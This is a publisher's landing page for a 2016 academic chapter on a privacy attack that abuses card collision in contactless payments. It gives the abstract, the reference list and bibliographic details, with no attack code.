Top

Published in:

2016 | OriginalPaper | Chapter

NFC Payment Spy: A Privacy Attack on Contactless Payments

Authors : Maryam Mehrnezhad, Mohammed Aamir Ali, Feng Hao, Aad van Moorsel

Published in: Security Standardisation Research

Publisher: Springer International Publishing

Activate our intelligent search to find suitable subject content or patents.

search-config

AI-assisted search

Off

Abstract

In a contactless transaction, when more than one card is presented to the payment terminal’s field, the terminal does not know which card to choose to proceed with the transaction. This situation is called card collision. EMV (which is the primary standard for smart card payments) specifies that the reader should not proceed when it detects a card collision and that instead it should notify the payer. In comparison, the ISO/IEC 14443 standard specifies that the reader should choose one card based on comparing the UIDs of the cards detected in the field. However, our observations show that the implementation of contactless readers in practice does not follow EMV’s card collision algorithm, nor does it match the card collision procedure specified in ISO.

Due to this inconsistency between the implementation and the standards, we show an attack that may compromise the user’s privacy by collecting the user’s payment details. We design and implement a malicious app simulating an NFC card which the user needs to install on her phone. When she aims to pay contactlessly while placing her card close to her phone, this app engages with the terminal before the card does. The experiments show that even when the terminal detects a card collision (the app essentially acts like a card), it proceeds with the EMV protocol. We show the app can retrieve from the terminal the transaction data, which include information about the payment such as the amount and date. The experimental results show that our app can effectively spy on contactless payment transactions, winning the race condition caused by card collisions around 66 % when testing with different cards. By suggesting these attacks we raise awareness of privacy and security issues in the specifications, standardisation and implementations of contactless cards and readers.

Dont have a licence yet? Then find out more about our products and how to get one now:

Springer Professional "Wirtschaft+Technik"

Online-Abonnement

Mit Springer Professional "Wirtschaft+Technik" erhalten Sie Zugriff auf:

über 102.000 Bücher
über 537 Zeitschriften

aus folgenden Fachgebieten:

Automobil + Motoren
Bauwesen + Immobilien
Business IT + Informatik
Elektrotechnik + Elektronik
Energie + Nachhaltigkeit
Finance + Banking
Management + Führung
Marketing + Vertrieb
Maschinenbau + Werkstoffe
Versicherung + Risiko

Jetzt Wissensvorsprung sichern!

inform now

Springer Professional "Technik"

Online-Abonnement

Mit Springer Professional "Technik" erhalten Sie Zugriff auf:

über 67.000 Bücher
über 390 Zeitschriften

aus folgenden Fachgebieten:

Automobil + Motoren
Bauwesen + Immobilien
Business IT + Informatik
Elektrotechnik + Elektronik
Energie + Nachhaltigkeit
Maschinenbau + Werkstoffe

Jetzt Wissensvorsprung sichern!

inform now

Springer Professional "Wirtschaft"

Online-Abonnement

Mit Springer Professional "Wirtschaft" erhalten Sie Zugriff auf:

über 67.000 Bücher
über 340 Zeitschriften

aus folgenden Fachgebieten:

Bauwesen + Immobilien
Business IT + Informatik
Finance + Banking
Management + Führung
Marketing + Vertrieb
Versicherung + Risiko

Jetzt Wissensvorsprung sichern!

inform now

previous chapter Cryptanalysis of GlobalPlatform Secure Channel Protocols

next chapter Security Analysis of the W3C Web Cryptography API

Available only for authorised users

theukcardsassociation.org.uk/contactless_contactless_statistics/.

nfcworld.com/nfc-phones-list/.

For the rest of this paper, unless noted otherwise, by ISO standard we mean ISO/IEC 14443, and by EMV standard, we mean EMV Contactless Specifications.

In the rest of this paper unless noted otherwise, by bank card we mean contactless payment card.

developer.android.com/reference/android/nfc/Tag.html#getId.

theukcardsassociation.org.uk/Contactless_(our_views)/index.asp.

Host-based card emulation. http://developer.android.com/guide/topics/connectivity/nfc/hce.html.

International Organization for Standardization, BS ISO, IEC 14443–1: 2008+A1: 2012 Identification cards. Contactless integrated circuit cards. Proximity cards. Physical characteristics (2012). http://www.bsol.bsigroup.com

International Organization for Standardization, BS ISO, IEC 14443–2: 2010+A2: 2012 Identification cards. Contactless integrated circuit cards. Proximity cards. Radio frequency power and signal interface (2012). http://www.bsol.bsigroup.com

International Organization for Standardization, BS ISO, IEC 14443–3: 2011+A6: 2014 Identification cards. Contactless integrated circuit cards. Proximity cards. Initialization and anticollision (2014). http://www.bsol.bsigroup.com

International Organization for Standardization, BS ISO, IEC 14443–4: 2008+A4: 2014 Identification cards. Contactless integrated circuit cards. Proximity cards. Transmission protocol (2014). http://www.bsol.bsigroup.com

EMV Contactless Specifications for Payment Systems, Book A: Architecture and General Requirements (2015). http://www.emvco.com/specifications.aspx?id=21

EMV Contactless Specifications for Payment Systems, Book B: Entry Point (2015). http://www.emvco.com/specifications.aspx?id=21

EMV Contactless Specifications for Payment Systems, Book C2: Kernel 2 Specification (2015). http://www.emvco.com/specifications.aspx?id=21

EMV Contactless Specifications for Payment Systems, Book C3: Kernel 3 Specification (2015). http://www.emvco.com/specifications.aspx?id=21

10.

EMV Contactless Specifications for Payment Systems, Book D: Contactless Communication Protocol (2015). http://www.emvco.com/specifications.aspx?id=21

11.

EMV Integrated Circuit Card Specifications for Payment Systems, Book 3 (2011). http://www.emvco.com/specifications.aspx?id=223

12.

International Organization for Standardization, BS ISO, IEC 7816–4: 2013, Identification cards. Integrated circuit cards. Organization, security and commands for interchange (2013). http://www.bsol.bsigroup.com

13.

Aviv, A.J., Sapp, B., Blaze, M., Smith, J.M.: Practicality of accelerometer side channels on smartphones. In: Proceedings of the 28th Annual Computer Security Applications Conference, pp. 41–50. ACM (2012)

14.

Balebako, R., Jung, J., Lu, W., Cranor, L.F., Nguyen, C.: “little brothers watching you”: Raising awareness of data leaks on smartphones. In: Proceedings of the Ninth Symposium on Usable Privacy and Security, SOUPS 2013, pp. 12:1–12:11. ACM, New York (2013)

15.

Cai, L., Chen, H.: Touchlogger: inferring keystrokes on touch screen from smartphone motion. In: HotSec (2011)

16.

Curphey, M.: Card clash, what is it, and how to avoid ir (2014). http://uk.creditcards.com/credit-card-news/what-is-card-clash-and-how-to-avoid-it-1372.php

17.

Emms, M., Arief, B., Little, N., Moorsel, A.: Risks of offline verify PIN on contactless cards. In: Sadeghi, A.-R. (ed.) FC 2013. LNCS, vol. 7859, pp. 313–321. Springer, Heidelberg (2013). doi:10.1007/978-3-642-39884-1_26 CrossRef

18.

Halevi, T., Ma, D., Saxena, N., Xiang, T.: Secure proximity detection for NFC devices based on ambient sensor data. In: Foresti, S., Yung, M., Martinelli, F. (eds.) ESORICS 2012. LNCS, vol. 7459, pp. 379–396. Springer, Heidelberg (2012). doi:10.1007/978-3-642-33167-1_22 CrossRef

19.

Li, H., Ma, D., Saxena, N., Shrestha, B., Zhu, Y.: Tap-wave-rub: lightweight malware prevention for smartphones using intuitive human gestures. In: Proceedings of the Sixth ACM Conference on Security and Privacy in Wireless and Mobile Networks, WiSec 2013, pp. 25–30. ACM, New York (2013)

20.

Marshall, G.: Travel using contactless cards: an update from tfl (2014). http://londonist.com/2014/07/travel-using-contactless-cards-an-update-from-tfl

21.

Mehrnezhad, M., Hao, F., Shahandashti, S.F.: Tap-tap and pay (TTP): preventing the mafia attack in NFC payment. In: Chen, L., Matsuo, S. (eds.) SSR 2015. LNCS, vol. 9497, pp. 21–39. Springer, Heidelberg (2015). doi:10.1007/978-3-319-27152-1_2 CrossRef

22.

Mehrnezhad, M., Toreini, E., Shahandashti, S.F., Hao, F.: Touchsignatures: identification of user touch actions based on mobile sensors via javascript. In: Proceedings of the 10th ACM Symposium on Information, Computer and Communications Security, ASIA CCS 2015, pp. 673–673. ACM, New York (2015)

23.

Mehrnezhad, M., Toreini, E., Shahandashti, S.F., Hao, F.: Touchsignatures: identification of user touch actions and pins based on mobile sensor data via javascript. J. Inf. Secur. Appl. 26, 23–38 (2016)

24.

Miluzzo, E., Varshavsky, A., Balakrishnan, S., Choudhury, R.R.: Tapprints: your finger taps have fingerprints. In: Proceedings of the 10th International Conference on Mobile Systems, Applications, and Services, pp. 323–336. ACM (2012)

25.

Morley, K.: Contactless cards: how to avoid paying twice (2014). http://www.telegraph.co.uk/finance/personalfinance/money-saving-tips/11215583/Contactless-cards-how-to-avoid-paying-twice.html

26.

ISO 14443, ISO 18092, Type-A, Type-B, Type-F, Felica, Calypso NFCIP, NFC-HELP! (2009). http://www.nfc.cc/2009/01/03/iso-14443-iso-18092-type-a-type-b-type-f-felica-calypso-nfcip-nfc-help/

27.

AN10927, MIFARE and handling of UIDs. By NXP, Company Public (2013)

28.

Owusu, E., Han, J., Das, S., Perrig, A., Zhang, J.: Accessory: password inference using accelerometers on smartphones. In: Proceedings of the Twelfth Workshop on Mobile Computing Systems & Applications, p. 9. ACM (2012)

29.

Saul, H.: Oyster card users pay up to £91 more each week than peopleusing new contactless payment (2014). http://www.independent.co.uk/news/uk/home-news/oyster-card-users-pay-up-to-91-more-each-week-than-people-using-new-contactless-payment-9843642.htmll

30.

Shrestha, B., Saxena, N., Truong, H.T.T., Asokan, N.: Drone to the rescue: relay-resilient authentication using ambient multi-sensing. In: Christin, N., Safavi-Naini, R. (eds.) FC 2014. LNCS, vol. 8437, pp. 349–364. Springer, Heidelberg (2014). doi:10.1007/978-3-662-45472-5_23

31.

Simon, L., Anderson, R.: Pin skimmer: inferring pins through the camera and microphone. In: Proceedings of the Third ACM Workshop on Security and Privacy in Smartphones and Mobile Devices, SPSM 2013, pp. 67–78. ACM, New York (2013)

32.

Spreitzer, R.: Pin skimming: exploiting the ambient-light sensor in mobile devices. In: Proceedings of the 4th ACM Workshop on Security and Privacy in Smartphones and Mobile Devices, SPSM 2014, pp. 51–62. ACM, New York (2014)

33.

Why contactless cards can leave you with a losing deal (2014). http://www.theguardian.com/money/2013/may/25/contactless-cards

34.

Watch out for card clash. https://tfl.gov.uk/fares-and-payments/contactless/card-clash

35.

Vila, J., Rodríguez, R.J.: Practical experiences on NFC relay attacks with android. In: Mangard, S., Schaumont, P. (eds.) RFIDSec 2015. LNCS, vol. 9440, pp. 87–103. Springer, Heidelberg (2015). doi:10.1007/978-3-319-24837-0_6

36.

Xu, Z., Bai, K., Zhu, S.: Taplogger: inferring user inputs on smartphone touchscreens using on-board motion sensors. In: Proceedings of the Fifth ACM Conference on Security and Privacy in Wireless and Mobile Networks, pp. 113–124. ACM (2012)

Title: NFC Payment Spy: A Privacy Attack on Contactless Payments
Authors: Maryam Mehrnezhad
Mohammed Aamir Ali
Feng Hao
Aad van Moorsel
Publisher: Springer International Publishing
Book: Security Standardisation Research
Print ISBN: 978-3-319-49099-1

Electronic ISBN: 978-3-319-49100-4

Copyright Year: 2016
DOI: https://doi.org/10.1007/978-3-319-49100-4_4

Springer Professional

Abstract

Please log in to get access to your license.

Dont have a licence yet? Then find out more about our products and how to get one now:

Springer Professional "Wirtschaft+Technik"

Springer Professional "Technik"

Springer Professional "Wirtschaft"

Premium Partner